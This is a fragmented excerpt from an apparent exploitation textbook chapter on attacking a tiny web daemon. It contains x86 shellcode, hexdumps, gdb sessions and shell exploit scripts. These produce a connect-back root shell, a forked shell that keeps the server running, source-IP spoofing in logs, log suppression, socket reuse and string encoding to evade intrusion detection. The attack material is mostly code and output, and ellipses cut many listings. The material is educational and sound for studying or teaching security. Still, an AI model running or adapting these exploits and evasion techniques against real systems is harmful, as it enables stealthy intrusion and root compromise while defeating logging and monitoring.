web requests
...

A skilled hacker can not only crack open a program to exploit it, he can also put
the program back together again and keep it running
...

One Step at a Time
Complex exploits are difficult because so many different things can go wrong, with
no indication of the root cause
...
The end goal is a piece of shellcode that will spawn a shell yet keep
the tinyweb server running
...
For now, the first step should be
figuring out how to put the tinyweb daemon back together after exploiting it
...

Since the tinyweb daemon redirects standard out to /dev/null, writing to standard
out isn't a reliable marker for shellcode
...
This can be done by making a call to open(), and then
close()
...

We could look through the include files to figure out what O_CREAT and all the
other necessary defines actually are and do all the bitwise math for the
arguments, but that's sort of a pain in the ass
...
The strace program can be used on any program to show
every system call it makes
...

reader@hacking:~/booksrc $ strace
...
/notetaker", ["
...
so
...
so
...
so
...
}) = 0
mmap2(NULL, 70799, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fd3000
close(3) = 0

access("/etc/ld
...
nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc
...
6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0`\1\000"
...
}) = 0
mmap2(NULL, 1312164, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e92000
mmap2(0xb7fcd000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13b) = 0xb7fcd000
mmap2(0xb7fd0000, 9636, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fd0000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e91000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e916c0, limit:1048575, seg_32bit:1,
contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fcd000, 4096, PROT_READ) = 0
munmap(0xb7fd3000, 70799) = 0
brk(0) = 0x804a000
brk(0x806b000) = 0x806b000
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2),
...
, 37[DEBUG] buffer @ 0x804a008: 'test'
) = 37
write(1, "[DEBUG] datafile @ 0x804a070: \'/"
...
}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe3000
_llseek(3, 0, 0xbffff4e4, SEEK_CUR) = -1 ESPIPE (Illegal seek)
write(3, "[!!] Fatal Error in main() while"
...
c
fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
fatal("in main() while opening file");
reader@hacking:~/booksrc $

When run through strace, the notetaker binary's suid-bit isn't used, so it doesn't
have permission to open the data file
...
Since they match, we can safely use the values passed to the
open() function in the notetaker binary as the arguments for the open() system
call in our shellcode
...

reader@hacking:~/booksrc $ gdb -q
...
so
...

(gdb) set dis intel
(gdb) disass main

Dump of assembler code for function main:
0x0804875f : push ebp
0x08048760 : mov ebp,esp
0x08048762 : sub esp,0x28
0x08048765 : and esp,0xfffffff0
0x08048768 : mov eax,0x0
0x0804876d : sub esp,eax
0x0804876f : mov DWORD PTR [esp],0x64
0x08048776 : call 0x8048601
0x0804877b : mov DWORD PTR [ebp-12],eax
0x0804877e : mov DWORD PTR [esp],0x14
0x08048785 : call 0x8048601
0x0804878a : mov DWORD PTR [ebp-16],eax
0x0804878d : mov DWORD PTR [esp+4],0x8048a9f
0x08048795 : mov eax,DWORD PTR [ebp-16]
0x08048798 : mov DWORD PTR [esp],eax
0x0804879b : call 0x8048480
0x080487a0 : cmp DWORD PTR [ebp+8],0x1
0x080487a4 : jg 0x80487ba
0x080487a6 : mov eax,DWORD PTR [ebp-16]
0x080487a9 : mov DWORD PTR [esp+4],eax
0x080487ad : mov eax,DWORD PTR [ebp+12]
0x080487b0 : mov eax,DWORD PTR [eax]
0x080487b2 : mov DWORD PTR [esp],eax
0x080487b5 : call 0x8048733
0x080487ba : mov eax,DWORD PTR [ebp+12]
0x080487bd : add eax,0x4
0x080487c0 : mov eax,DWORD PTR [eax]
0x080487c2 : mov DWORD PTR [esp+4],eax
0x080487c6 : mov eax,DWORD PTR [ebp-12]
0x080487c9 : mov DWORD PTR [esp],eax
0x080487cc : call 0x8048480
0x080487d1 : mov eax,DWORD PTR [ebp-12]
0x080487d4 : mov DWORD PTR [esp+8],eax
0x080487d8 : mov eax,DWORD PTR [ebp-12]
0x080487db : mov DWORD PTR [esp+4],eax
0x080487df : mov DWORD PTR [esp],0x8048aaa
0x080487e6 : call 0x8048490
0x080487eb : mov eax,DWORD PTR [ebp-16]
0x080487ee : mov DWORD PTR [esp+8],eax
0x080487f2 : mov eax,DWORD PTR [ebp-16]
0x080487f5 : mov DWORD PTR [esp+4],eax
0x080487f9 : mov DWORD PTR [esp],0x8048ac7
0x08048800 : call 0x8048490
0x08048805 : mov DWORD PTR [esp+8],0x180
0x0804880d : mov DWORD PTR [esp+4],0x441
0x08048815 : mov eax,DWORD PTR [ebp-16]
0x08048818 : mov DWORD PTR [esp],eax
0x0804881b : call 0x8048410

---Type <return> to continue, or q to quit---q
Quit
(gdb)

Remember that the arguments to a function call will be pushed to the stack in
reverse
...
The first argument is a pointer to the
name of the file in EAX, the second argument (put at [esp+4]) is 0x441, and the
third argument (put at [esp+8]) is 0x180
...
The following shellcode uses these values to create a file called Hacked in
the root filesystem
...
s
BITS 32
; Mark the filesystem to prove you ran
...

; eax = returned file descriptor
mov ebx, eax ; File descriptor to second arg
push BYTE 0x6 ; Close ()
pop eax
int 0x80 ; Close file
...

int 0x80 ; Exit(0), to avoid an infinite loop
...
Finally,
it calls exit to avoid an infinite loop
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ nasm mark
...
#[1
...
j
...
A
...
f
...
X
...
|
00000020 89 c3 40 cd 80 e8 d8 ff ff ff 2f 48 61 63 6b 65 |
...
/xtool_tinywebd_steath
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (357 b)] [shellcode (44 b)] [ret addr (128 b)]
localhost [127
...
0
...
The disassembly of main() in the output
below shows that we can safely return to the addresses 0x08048f64, 0x08048f65,
or 0x08048fb7 to get back into the connection accept loop
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
:[ output trimmed ]:
...

(gdb)

All three of these addresses basically go to the same place
...

However, there are other things we need to fix first
...
These are the instructions that set up and
remove the stack frame structures on the stack
...
:[ output trimmed ]:
...

(gdb)

At the beginning of the function, the function prologue saves the current values of
the EBP and EBX registers by pushing them to the stack, and sets EBP to the
current value of ESP so it can be used as a point of reference for accessing stack
variables
...
The function epilogue at the end restores ESP by adding
0x644 back to it and restores the saved values of EBX and EBP by popping them
from the stack back into the registers
...
The return address that we
overwrite is pushed to the stack when handle_connection() is called, so the
saved values for EBP and EBX pushed to the stack in the function prologue will be
between the return address and the corruptible buffer
...
Since we don't gain
control of the program's execution until the return instruction, all the instructions
between the overwrite and the return instruction must be executed
...
The assembly instruction int3 creates the byte 0xcc, which is
literally a debugging breakpoint
...
This breakpoint will be caught by GDB, allowing us to examine
the exact state of the program after the shellcode executes
...
s
BITS 32
; Mark the filesystem to prove you ran
...

; eax = returned file descriptor
mov ebx, eax ; File descriptor to second arg
push BYTE 0x6 ; Close ()
pop eax
int 0x80 ; Close file
...
In the
output below, a breakpoint is set right before handle_connection() is called
...

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 23497 0
...
0 1636 356 ? Ss 17:08 0:00
...
0 0
...
c
reader@hacking:~/booksrc $ sudo gdb -q --pid=23497 --symbols=
...
out
warning: not using untrusted file "/home/reader/
...
so
...

Attaching to process 23497
/cow/home/reader/booksrc/tinywebd: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
c, line 72
...

In the output above, a breakpoint is set right before handle_connection() is
called (shown in bold)
...
This will advance execution to the breakpoint in
the other terminal
...
s
reader@hacking:~/booksrc $
...
sh mark_break 127
...
0
...
0
...
1
shellcode: mark_break (44 bytes)
[NOP (372 bytes)] [shellcode (44 bytes)] [ret addr (128 bytes)]
localhost [127
...
0
...
Some
important stack registers are displayed, which show the stack setup before (and
after) the handle_connection() call
...
Then these stack
registers are checked again to view their state at the moment the shellcode
begins to execute
...
c:72
72 handle_connection(new_sockfd, &client_addr, logfd);
(gdb) i r esp ebx ebp
esp 0xbffff7e0 0xbffff7e0
ebx 0xb7fd5ff4 -1208131596
ebp 0xbffff848 0xbffff848
(gdb) cont
Continuing
...

0xbffff753 in ?? ()
(gdb) i r esp ebx ebp
esp 0xbffff7e0 0xbffff7e0
ebx 0x6 6
ebp 0xbffff624 0xbffff624
(gdb)

This output shows that EBX and EBP are changed at the point the shellcode
begins execution
...
The compiler probably saved this
register to the stack due to some rule about calling convention, even though it
isn't really used
...
Because the original saved value of EBP was overwritten
by our exploit, the original value must be recreated
...
Since computers are deterministic, the assembly
instructions will clearly explain how to do all this
...
Since ESP wasn't damaged by our exploit, we can restore
the value for EBP by adding 0x68 to ESP at the end of our shellcode
...
The proper return address for the
handle_connection() call is the instruction found after the call at 0x08048fb7
...

mark_restore
...

jmp short one
two:
pop ebx ; Filename
xor ecx, ecx
mov BYTE [ebx+7], cl ; Null terminate filename
push BYTE 0x5 ; Open()
pop eax
mov WORD cx, 0x441 ; O_WRONLY|O_APPEND|O_CREAT
xor edx, edx
mov WORD dx, 0x180 ; S_IRUSR|S_IWUSR
int 0x80 ; Open file to create it
...

push 0x08048fb7 ; Return address
...
The tinyweb daemon doesn't
even know that something happened
...
s
reader@hacking:~/booksrc $ hexdump -C mark_restore
00000000 eb 26 5b 31 c9 88 4b 07 6a 05 58 66 b9 41 04 31 |
...
K
...
Xf
...
1|
00000010 d2 66 ba 80 01 cd 80 89 c3 6a 06 58 cd 80 8d 6c |
...
j
...
l|
00000020 24 68 68 b7 8f 04 08 c3 e8 d5 ff ff ff 2f 48 61 |$hh
...
/tinywebd
Starting tiny web daemon
...
/xtool_tinywebd_steath
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (348 b)] [shellcode (53 b)] [ret addr (128 b)]
localhost [127
...
0
...
0 0
...
/tinywebd
reader 26828 0
...
0 2880 748 pts/1 R+ 20:38 0:00 grep tinywebd
reader@hacking:~/booksrc $
...
0
...
1
The web server for 127
...
0
...
Since the shell is interactive, but we still want the process to
handle web requests, we need to fork to a child process
...
We want our
shellcode to fork and the child process to serve up the root shell, while the parent
process restores tinywebd's execution
...
s
...
The next few instructions
test to see if EAX is zero
...
Otherwise, we're in the parent process, so the shellcode restores execution
into tinywebd
...
s
BITS 32
push BYTE 0x02 ; Fork is syscall #2
pop eax
int 0x80 ; After the fork, in child process eax == 0
...

; In the parent process, restore tinywebd
...

push 0x08048fb7 ; Return address
...

xor ebx, ebx ; ebx is the type of socketcall
...

...
s
...
Multiple jobs are used instead of
multiple terminals, so the netcat listener is sent to the background by ending the
command with an ampersand (&)
...
The process is then suspended by
hitting CTRL-Z, which returns to the BASH shell
...

reader@hacking:~/booksrc $ nasm loopback_shell_restore
...
X
...
l$hh
...
jfX
...
CRj
...
|
00000020 e1 cd 80 96 6a 66 58 43 68 7f bb bb 01 66 89 54 |
...
f
...
fhzifS
...
QV
...
I
...
|
00000050 0b 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 |
...
R
...
S
...
/tinywebd
Starting tiny web daemon
...
/xtool_tinywebd_steath
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (299 b)] [shellcode (102 b)] [ret addr (128 b)]
localhost [127
...
0
...
/webserver_id 127
...
0
...
0
...
1 is Tiny webserver
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

With this shellcode, the connect-back root shell is maintained by a separate child
process, while the parent process continues to serve web content
...
This type of camouflage will
make the attacks harder to find, but they are not invisible
...

Since we're mucking around with the insides of the tinyweb daemon now, we
should be able to hide our presence even better
...

Code Segment from tinywebd
...

The best way to generate a sockaddr_in structure for injection is to write a little
C program that creates and dumps the structure
...

addr_struct
...
h>
#include ...
h>
#include ...
sin_family = AF_INET;
addr
...
sin_addr
...
The output below
shows the program being compiled and executed
...
c
reader@hacking:~/booksrc $
...
34
...
78 9090
##
"8N_reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
...
34
...
78 9090 | hexdump -C
00000000 02 00 23 82 0c 22 38 4e 00 00 00 00 f4 5f fd b7 |
...
_
...
Since the fake request is 15 bytes long and we
know the buffer starts at 0xbffff5c0, the fake address will be injected at
0xbffff5cf
...
sh
RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0
reader@hacking:~/booksrc $ gdb -q -batch -ex "p /x 0xbffff5c0 + 15"
$1 = 0xbffff5cf
reader@hacking:~/booksrc $

Since the client_addr_ptr is passed as a second function argument, it will be on
the stack two dwords after the return address
...

xtool_tinywebd_spoof
...
34
...
78"
SPOOFPORT="9090"
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0 <shellcode file> <target IP>"
exit
fi
FAKEREQUEST="GET / HTTP/1
...
/addr_struct "$SPOOFIP" "$SPOOFPORT";
perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;

perl -e "print \"$RETADDR\"x32
...
\"\r\n\"") | nc -w 1 -v $2 80

The best way to explain exactly what this exploit script does is to watch tinywebd
from within GDB
...

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 27264 0
...
0 1636 420 ? Ss 20:47 0:00
...
0 0
...
c
reader@hacking:~/booksrc $ sudo gdb -q --pid=27264 --symbols=
...
out
warning: not using untrusted file "/home/reader/
...
so
...

Attaching to process 27264
/cow/home/reader/booksrc/tinywebd: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
The connection is
79 * processed as a web request, and this function replies over the connected
80 * socket
...

81 */
82 void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd)
{
83 unsigned char *ptr, request[500], resource[500], log_buffer[500];
84 int fd, length;
85
86 length = recv_line(sockfd, request);
(gdb)
87
88 sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);
89
90 ptr = strstr(request, " HTTP/"); // Search for valid looking request
...

95 ptr = NULL; // Set ptr to NULL (used to flag for an invalid request)
...
c, line 86
...
c, line 89
...

Then, from another terminal, the new spoofing exploit is used to advance
execution in the debugger
...
/xtool_tinywebd_spoof
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 332] [shellcode 53] [ret addr 128] [*fake_addr 8]
localhost [127
...
0
...

Breakpoint 1, handle_connection (sockfd=9, client_addr_ptr=0xbffff810, logfd=3) at
tinywebd
...
c:86
#1 0x08048fb7 in main () at tinywebd
...

Breakpoint 2, handle_connection (sockfd=-1073744433, client_addr_ptr=0xbffff5cf,
logfd=2560)
at tinywebd
...

(gdb) x/24x request + 500
0xbffff7b4: 0xbffff624 0xbffff624 0xbffff624 0xbffff624
0xbffff7c4: 0xbffff624 0xbffff624 0xbffff624 0xbffff624
0xbffff7d4: 0xbffff624 0xbffff624 0xbffff624 0xbffff5cf
0xbffff7e4: 0xbffff5cf 0x00000a00 0xbffff838 0x00000004
0xbffff7f4: 0x00000000 0x00000000 0x08048a30 0x00000000
0xbffff804: 0x0804a8c0 0xbffff818 0x00000010 0x3bb40002
(gdb) print client_addr_ptr
$3 = (struct sockaddr_in *) 0xbffff5cf
(gdb) print client_addr_ptr
$4 = (struct sockaddr_in *) 0xbffff5cf
(gdb) print *client_addr_ptr
$5 = {sin_family = 2, sin_port = 33315, sin_addr = {s_addr = 1312301580},
sin_zero = "\000\000\000\000_
(gdb) x/s log_buffer
0xbffff1c0: "From 12
...
56
...
1\"\t"
(gdb)

At the first breakpoint, client_addr_ptr is shown to be at 0xbffff7e4 and
pointing to 0xbffff810
...
The second breakpoint is after the overwrite, so the
client_addr_ptr at 0xbffff7e4 is shown to be overwritten with the address of
the injected sockaddr_in structure at 0xbffff5cf
...

Logless Exploitation
Ideally, we want to leave no trace at all
...
However, let's assume
this program is part of a secure infrastructure where the log files are mirrored to
a secure logging server that has minimal access or maybe even a line printer
...
The timestamp()
function in the tinyweb daemon tries to be secure by writing directly to an open
file descriptor
...
This would be a fairly effective countermeasure;
however, it was implemented poorly
...

Even though logfd is a global variable, it is also passed to
handle_connection() as a function argument
...
Since this argument is found right after the client_addr_ptr
on the stack, it gets partially overwritten by the null terminator and the extra
0x0a byte found at the end of the exploit buffer
...
Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 27264
reader@hacking:~/booksrc $ sudo kill 27264
reader@hacking:~/booksrc $

As long as the log file descriptor doesn't happen to be 2560 (0x0a00 in
hexadecimal), every time handle_connection() tries to write to the log it will fail
...
In the output below, strace is
used with the -p command-line argument to attach to a running process
...
Once again, the
spoofing exploit tool is used in another terminal to connect and advance
execution
...
/tinywebd
Starting tiny web daemon
...
0 0
...
/tinywebd
reader 525 0
...
0 2880 748 pts/1 R+ 23:24 0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(2560, "09/19/2007 23:29:30> ", 21) = -1 EBADF (Bad file descriptor)

write(2560, "From 12
...
56
...
, 47) = -1 EBADF (Bad file descriptor)
Process 478 detached
reader@hacking:~/booksrc $

This output clearly shows the attempts to write to the log file failing
...
Carelessly mangling this pointer will usually lead to a crash
...
Since
the tinyweb daemon redirects standard out to /dev/null, the next exploit script will
overwrite the passed logfd variable with 1, for standard output
...

xtool_tinywebd_silent
...
34
...
78"
SPOOFPORT="9090"
if [ -z "$2" ]; then # If argument 2 is blank
echo "Usage: $0 <shellcode file> <target IP>"
exit
fi
FAKEREQUEST="GET / HTTP/1
...
/addr_struct "$SPOOFIP" "$SPOOFPORT";
perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
cat $1;
perl -e "print \"$RETADDR\"x32
...
\"\x01\x00\x00\x00\r\n\"") | nc -w 1 -v $2 80

When this script is used, the exploit is totally silent and nothing is written to the
log file
...
/tinywebd
Starting tiny web daemon
...
log

-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd
...
/xtool_tinywebd_silent
...
0
...
1
target IP: 127
...
0
...
1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 332] [shellcode 53] [ret addr 128] [*fake_addr 8]
localhost [127
...
0
...
log
-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd
...
Using this technique,
we can exploit tinywebd without leaving any trace in the log files
...
This is shown by
strace in the output below, when the silent exploit tool is run in another terminal
...
0 0
...
/tinywebd
reader 1005 0
...
0 2880 748 pts/1 R+ 23:36 0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(1, "09/19/2007 23:36:31> ", 21) = 21
write(1, "From 12
...
56
...
, 47) = 47
Process 478 detached
reader@hacking:~/booksrc $

The Whole Infrastructure
As always, details can be hidden in the bigger picture
...
Countermeasures such as intrusion detection
systems (IDS) and intrusion prevention systems (IPS) can detect abnormal
network traffic
...
In particular, the connection to
port 31337 used in our connect-back shellcode is a big red flag
...
A highly
secure infrastructure might even have the firewall set up with egress filters to
prevent outbound connections
...

Socket Reuse
In our case, there's really no need to open a new connection, since we already
have an open socket from the web request
...
This prevents additional TCP connections from being logged and
allows exploitation in cases where the target host cannot open outbound
connections
...
c shown below
...
c
while(1) { // Accept loop
sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
if(new_sockfd == -1)
fatal("accepting connection");
handle_connection(new_sockfd, &client_addr, logfd);
}
return 0;
}
/* This function handles the connection on the passed socket from the
* passed client address and logs to the passed FD
...
Finally, the passed socket is closed at the end of the function
...
This overwrite happens before we gain
control of the program in the shellcode, so there's no way to recover the previous
value of sockfd
...

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root 478 0
...
0 1636 420 ? Ss 23:24 0:00
...
0 0
...
c
reader@hacking:~/booksrc $ sudo gdb -q --pid=478 --symbols=
...
out
warning: not using untrusted file "/home/reader/
...
so
...

Attaching to process 478
/cow/home/reader/booksrc/tinywebd: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
The connection is
79 * processed as a web request, and this function replies over the connected
80 * socket
...

81 */
82 void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd)
{
83 unsigned char *ptr, request[500], resource[500], log_buffer[500];
84 int fd, length;
85
86 length = recv_line(sockfd, request);
(gdb) break 86
Breakpoint 1 at 0x8048fc3: file tinywebd
...

(gdb) cont
Continuing
...

Breakpoint 1, handle_connection (sockfd=13, client_addr_ptr=0xbffff810, logfd=3) at
tinywebd
...

(gdb) bt
#0 handle_connection (sockfd=13, client_addr_ptr=0xbffff810, logfd=3) at tinywebd
...
c:72
(gdb) select-frame 1
(gdb) x/x &new_sockfd
0xbffff83c: 0x0000000d
(gdb) quit
The program is running
...
Using this, we can create shellcode that uses the socket file
descriptor stored here instead of creating a new connection
...
If this happens and the shellcode is using a hardcoded stack address, the exploit will fail
...
If we use an address
relative to ESP, then even if the stack shifts around a bit, the address of
new_sockfd will still be correct since the offset from ESP will be the same
...
Using this value for ESP, the offset is shown to be 0x5c bytes
...

socket_reuse_restore
...

test eax, eax
jz child_process ; In child process spawns a shell
...

lea ebp, [esp+0x68] ; Restore EBP
...

ret ; Return
...

lea edx, [esp+0x5c] ; Put the address of new_sockfd in edx
...

push BYTE 0x02
pop ecx ; ecx starts at 2
...

jns dup_loop ; If the sign flag is not set, ecx is not negative
...

push 0x68732f2f ; push "//sh" to the stack
...

mov ebx, esp ; Put the address of "/bin//sh" into ebx, via esp
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
...
This second
exploit script adds an additional cat - command to the end of the exploit buffer
...
Running cat on standard input is
somewhat useless in itself, but when the command is piped into netcat, this
effectively ties standard input and output to netcat's network socket
...
This is done with just a few
modifications (shown in bold) to the silent exploit tool
...
sh
#!/bin/sh
# Silent stealth exploitation tool for tinywebd
# also spoofs IP address stored in memory
# reuses existing socket - use socket_reuse shellcode

SPOOFIP="12
...
56
...
1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0
FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16))
echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE] [ret addr 128] [*fake_addr 8]"
(perl -e "print \"$FAKEREQUEST\"";

...
\"$FAKEADDR\"x2
...
The following
output demonstrates this
...
s
reader@hacking:~/booksrc $ hexdump -C socket_reuse_restore
00000000 6a 02 58 cd 80 85 c0 74 0a 8d 6c 24 68 68 b7 8f |j
...
t
...
|
00000010 04 08 c3 8d 54 24 5c 8b 1a 6a 02 59 31 c0 31 d2 |
...
j
...
1
...
Iy
...
R
...
|
0000003e
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
sh socket_reuse_restore 127
...
0
...
0
...
1
shellcode: socket_reuse_restore (62 bytes)
fake request: "GET / HTTP/1
...
0
...
1] 80 (www) open
whoami
root

By reusing the existing socket, this exploit is even quieter since it doesn't create
any additional connections
...

Payload Smuggling
The aforementioned network IDS or IPS systems can do more than just track
connections—they can also inspect the packets themselves
...
For example, a simple rule
looking for packets that contain the string /bin/sh would catch a lot of packets
containing shellcode
...

These types of network IDS signatures can be fairly effective at catching script
kiddies who are using exploits they downloaded from the Internet
...

String Encoding
To hide the string, we will simply add 5 to each byte in the string
...
This will build the desired string on the stack so it can be used
in the shellcode, while keeping it hidden during transit
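As a rough illustration of the add-5 encoding, here is a minimal C sketch. The helper names are hypothetical, and this runs on the attacker's side only; in the book the decoding is done by the shellcode itself in assembly.

```c
#include <stddef.h>
#include <stdint.h>

/* Add `key` to every byte, wrapping modulo 256. */
void shift_encode(uint8_t *buf, size_t len, uint8_t key) {
    for (size_t i = 0; i < len; i++)
        buf[i] = (uint8_t)(buf[i] + key);
}

/* Undo shift_encode by subtracting `key` from every byte. */
void shift_decode(uint8_t *buf, size_t len, uint8_t key) {
    for (size_t i = 0; i < len; i++)
        buf[i] = (uint8_t)(buf[i] - key);
}
```

Encoding the eight bytes of "/bin/sh" plus its null terminator with a key of 5 yields 34 67 6e 73 34 78 6d 05, so the literal string no longer appears in the packet. The last four of those bytes, read as a little-endian word, are the 0x056d7834 value pushed by the encoded shellcode.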
...

reader@hacking:~/booksrc $ echo "/bin/sh" | hexdump -C
00000000 2f 62 69 6e 2f 73 68 0a |/bin/sh
...
Also, two int3 instructions are used to put breakpoints in the
shellcode before and after the decoding
...

encoded_sockreuserestore_dbg
...

pop eax
int 0x80 ; After the fork, in child process eax == 0
...

; In the parent process, restore tinywebd
...

push 0x08048fb7 ; Return address
...

lea edx, [esp+0x5c] ; Put the address of new_sockfd in edx
...

push BYTE 0x02
pop ecx ; ecx starts at 2
...

jns dup_loop ; If the sign flag is not set, ecx is not negative
; execve(const char *filename, char *const argv [], char *const envp[])
mov BYTE al, 11 ; execve syscall #11
push 0x056d7834 ; push "/sh\x00" encoded +5 to the stack
...

mov ebx, esp ; Put the address of encoded "/bin/sh" into ebx
...

mov edx, esp ; This is an empty array for envp
...

mov ecx, esp ; This is the argv array with string ptr
...
It begins at 8 and counts
down to 0, since 8 bytes need to be decoded
...

reader@hacking:~/booksrc $ gcc -g tinywebd
...
/a
...
gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
out
Starting tiny web daemon
...
From another terminal, the shellcode is assembled and used with
the socket-reusing exploit tool
...
s
reader@hacking:~/booksrc $
...
sh encoded_sockreuserestore_dbg
127
...
0
...
0
...
1
shellcode: encoded_sockreuserestore_dbg (72 bytes)
fake request: "GET / HTTP/1
...
0
...
1] 80 (www) open

Back in the GDB window, the first int3 instruction in the shellcode is hit
...

Program received signal SIGTRAP, Trace/breakpoint trap
...

[tcsetpgrp failed in terminal_inferior: Operation not permitted]
Program received signal SIGTRAP, Trace/breakpoint trap
...
The following output shows the final shellcode being used
...
s >
encoded_sockreuserestore
...
s encoded_sockreuserestore
...
s
reader@hacking:~/booksrc $ hexdump -C encoded_sockreuserestore
00000000 6a 02 58 cd 80 85 c0 74 0a 8d 6c 24 68 68 b7 8f |j
...
t
...
|
00000010 04 08 c3 8d 54 24 5c 8b 1a 6a 02 59 31 c0 b0 3f |
...
j
...
?|
00000020 cd 80 49 79 f9 b0 0b 68 34 78 6d 05 68 34 67 6e |
...
h4xm
...
j
...
Jy
...
R|
00000040 89 e2 53 89 e1 cd 80 |
...
|
00000047
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $
...
sh encoded_sockreuserestore 127
...
0
...
0
...
1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1
...
0
...
1] 80 (www) open
whoami
root

How to Hide a Sled
The NOP sled is another signature that network IDSes and IPSes can easily detect
...
To avoid this signature, we can use
different single-byte instructions instead of NOP
...

Instruction   Hex    ASCII
inc eax       0x40   @
inc ebx       0x43   C
inc ecx       0x41   A
inc edx       0x42   B
dec eax       0x48   H
dec ebx       0x4B   K
dec ecx       0x49   I
dec edx       0x4A   J

Since we zero out these registers before we use them, we can safely use a random
combination of these bytes for the NOP sled
...
The easiest way to do
this would be by writing a sled-generation program in C, which is used with a
BASH script
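A sled generator along these lines might look like the following C sketch. It is not the book's program (which is not shown in this excerpt); the function names and the explicit seed parameter are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdlib.h>

/* The eight single-byte inc/dec opcodes for eax, ecx, edx and ebx. */
static const unsigned char SLED_BYTES[8] = {
    0x40, 0x41, 0x42, 0x43, 0x48, 0x49, 0x4A, 0x4B
};

/* Fill buf with a pseudo-random mix of the opcodes above. */
void fill_random_sled(unsigned char *buf, size_t len, unsigned int seed) {
    srand(seed);
    for (size_t i = 0; i < len; i++)
        buf[i] = SLED_BYTES[rand() % 8];
}

/* Count bytes that are not one of the eight sled opcodes. */
size_t count_non_sled_bytes(const unsigned char *buf, size_t len) {
    size_t bad = 0;
    for (size_t i = 0; i < len; i++) {
        int ok = 0;
        for (size_t j = 0; j < 8; j++)
            if (buf[i] == SLED_BYTES[j])
                ok = 1;
        if (!ok)
            bad++;
    }
    return bad;
}
```

Because every byte is a valid one-byte instruction that only touches registers the shellcode zeroes later, execution can land anywhere in the generated sled, just as with 0x90 bytes.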
...

Buffer Restrictions
Sometimes a program will place certain restrictions on buffers
...
Consider the following example
program, which is used to update product descriptions in a fictitious database
...

This program doesn't actually update a database, but it does have an obvious
vulnerability in it
...
c
#include ...
h>
#include ...
*/
void barf(char *message, void *extra) {
printf(message, extra);
exit(1);
}
/* Pretend this function updates a product description in a database
...

barf("Fatal: id argument must be less than %u bytes\n", (void *)MAX_ID_LEN);
for(i=0; i < strlen(desc)-1; i++) { // Only allow printable bytes in desc
...

}

